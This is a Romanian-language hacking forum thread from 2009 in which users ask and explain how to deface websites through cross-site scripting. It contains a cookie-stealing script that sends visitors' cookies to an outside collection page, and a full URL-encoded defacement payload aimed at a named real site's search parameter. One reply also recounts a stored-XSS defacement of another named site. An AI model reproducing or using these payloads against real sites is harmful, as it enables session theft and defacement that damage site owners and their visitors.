dRuNNNk Posted November 7, 2009 Report Share Posted November 7, 2009 ma poate ajuta cineva la xss defacement nu pricep ce trebuie sa fac.Cum pot face xss defacement fara sa ii dau adminului <script>document.location="http://siteulmeu.com/cookiestealer.php?cookie=" +document.cookies</script>se poate altfel?> Quote Link to comment Share on other sites More sharing options...
Vlachs Posted November 7, 2009 Report Share Posted November 7, 2009 document.innerHTML Quote Link to comment Share on other sites More sharing options...
dRuNNNk Posted November 7, 2009 Author Report Share Posted November 7, 2009 am inteles dar eu am siteu astaserials.ws daca introduc codul innerHTMl nu pateste nimic Quote Link to comment Share on other sites More sharing options...
1337 Posted November 7, 2009 Report Share Posted November 7, 2009 Ca sa dai deface prin xss trebuie ca vulnerabilitatea sa fie una de tip permanenta (cred?)Nu merge la toate siteurileLa asta de exemplu mergehttp://portal-braila.ro/cauta.php?cauta_textul=%3Cscript%3Edocument.body.innerHTML%3D%22%3Cstyle%3Ebody{visibility:hidden;+background:black;}%3C/style%3E%3Cdiv+style%3Dvisibility:visible;%3E%3Ccenter%3E%3Ch1%3E%3Cfont+color%3D'white'%3ENoi+vrem+%3C/font%3E%3Cfont+color%3D'red'%3Erespect+%3C/font%3E%3Cfont+color%3D'white'%3E!%3C/font%3E%3C/h1%3E%3Cbr%3E%3Cimg+src%3D'http://img379.imageshack.us/img379/5761/imagine3km7.png'%3E%3Cbr%3E%3Cobject+width%3D'448'+height%3D'46'%3E%3Cparam+name%3D'movie'+value%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'%3E%3C/param%3E%3Cparam+name%3D'allowFullScreen'+value%3D'true'%3E%3C/param%3E%3Cparam+name%3D'allowscriptaccess'+value%3D'always'%3E%3C/param%3E%3Cembed+src%3D'http://embed.trilulilu.ro/audio/smbdstopme/e020c0d1cdcfd8.swf'+type%3D'application/x-shockwave-flash'+allowscriptaccess%3D'always'+allowfullscreen%3D'true'+width%3D'448'+height%3D'46'%3E%3C/embed%3E%3C/object%3E%3Cbr+/%3E%3Cfont+color%3D'white'%3E%3Cb%3ECampanie+sustinuta+de:+xap,+ynneb,+edoknit,+yttif%3C/b%3E%3C/font%3E%3C/center%3E%3C/div%3E%22;%3C/script%3E&nr=0 Quote Link to comment Share on other sites More sharing options...
dRuNNNk Posted November 7, 2009 Author Report Share Posted November 7, 2009 multumesc baieti am mai invatat inca ceva Quote Link to comment Share on other sites More sharing options...
Tazor Posted November 8, 2009 Report Share Posted November 8, 2009 dRuNNNk crede ca daca introduce codul meu in parametru o sa dea deface la serials.ws ... codul xss trebuie sa fie afisat pe o pagina pentru a fi executat de browser-ul userului.fcsteaua.ro a luat deface cand a fost modificat numele unui articol cu codul de mai sus. cei care vizitau fcsteaua.ro/index.php executau javascriptul si le aparea altceva. e asa greu ?si cum ai modificat numele articolului? Quote Link to comment Share on other sites More sharing options...
Vlachs Posted November 9, 2009 Report Share Posted November 9, 2009 si cum ai modificat numele articolului?kw3 da uite aici material pt warn si tu imi dai mie Quote Link to comment Share on other sites More sharing options...